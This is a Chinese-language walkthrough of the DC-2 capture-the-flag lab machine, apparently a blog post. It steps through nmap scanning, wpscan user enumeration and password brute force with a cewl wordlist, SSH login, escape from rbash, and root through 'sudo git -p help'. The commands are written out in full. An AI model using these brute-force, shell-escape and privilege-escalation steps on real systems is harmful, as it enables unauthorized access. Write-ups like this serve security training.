文章描述了一位安全研究员如何通过网络扫描工具nmap找到靶机,识别出WordPress网站并使用wpscan枚举用户名。接着,利用cewl生成密码字典进行暴力破解,发现SSH服务并进行提权操作,最终绕过rbash限制。整个过程涉及了网络探测、漏洞利用和权限升级等多个环节。
信息收集
搜索网段为192.168.6.142,因为都是192.168.6.0/24内的网段,本机的ip地址和靶机可以ping,用排除法可以得到靶机的ip地址
在网页上输入发现不能打开
vim /etc/hosts,添加该主机然后成功打开
点击查看Flag,要找登录的地方
利用插件查了一下该网站的框架,发现是用的wordpress
借来下利用wpscan来扫描漏洞,使用该命令进行用户名枚举wpscan --url http://dc-2 -e u
-e:--enumerate,然后得出以下用户名
创建文件夹并把用户名写进去
nikto命令扫描 nikto -host 192.168.6.142,发现了登录界面
我们可以使用kali自带的字典生成工具 cewl,输入下列命令之后,爬虫会根据指定的URL和深度进行爬取,然后打印出可用于密码破解的字典:cewl -w passwd.txt http://dc-2 ,-w=-write:写入到passwd.txt文件中
将生成的密码字典写入到 pass.txt 的文件中,接着我们尝试着爆破后台登陆地址,使用wpscan命令将用户密码进行枚举,wpscan --url http://dc-2 -U usrs.txt -P passwd.txt,得到了两个用户的密码
尝试登陆得到了第二个flag,告诉我们可以从另一个方式进入
再次用nmap进行扫描nmap -A -p- 192.168.6.142(-A //全面系统检测、启用脚本检测、扫描,-p-就是扫描所有端口),发现ssh服务开放,7744端口
漏洞利用
可以利用ssh来连接tom进入ssh tom@192.168.61.134 -p 7744,进入后台
用ls发现有flag3但是用cat打不开于是用ls usr/bin查看有哪些命令使用权限,发现有vi ,也有less利用vi打开发现,意思好像是需要提权吧
需要绕过rbash
权限提升
有两种方法绕过来得到shell
export PATH=/usr/sbin:/usr/bin:/sbin:/bin
还有一种修改环境变量:
BASH_CMDS[a]=/bin/sh;a 注:把/bin/bash给a变量`
export PATH=$PATH:/bin/ 注:将/bin 作为PATH环境变量导出
export PATH=$PATH:/usr/bin 注:将/usr/bin作为PATH环境变量导出
然后回到home目录
这里进行了git发现tom没有超级权限,于是切换用户
输入sudo git -p help ,在此处输入!/bin/sh
总结
先用nmap对同网段扫描,然后确定需要进入的靶机,打开该靶机ip地址确认其使用的框架,然后进行全面扫描找到登陆点,wpscan扫描到账户名但没有密码利用crawl来进行密码暴力破解,然后对端口进行扫描看它的端口开启状态(ssh是否开启),利用ssh远程登录,获取其主机信息进行提权,一些命令vim /etc/hosts,设置主机,sudo git -p help 提权;ls usr/bin查看有哪些命令使用权限,绕过rbash
- cewl命令:你可以给它的爬虫指定URL地址和爬取深度,还可以添额外的外部链接,接下来Cewl会给你返回一个字典文件,然后可以用于密码破解。
- wpscan命令:能够扫描WordPress网站中的多种安全漏洞,其中包括WordPress本身的 漏洞、插件漏洞和主题漏洞。最新版本WPScan的数据库中包含超过18000种插件漏洞和2600种主题漏洞
1777
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
